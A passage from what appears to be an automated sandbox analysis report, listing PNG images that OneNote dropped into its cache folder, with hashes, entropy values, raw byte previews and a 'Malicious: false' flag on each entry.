Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
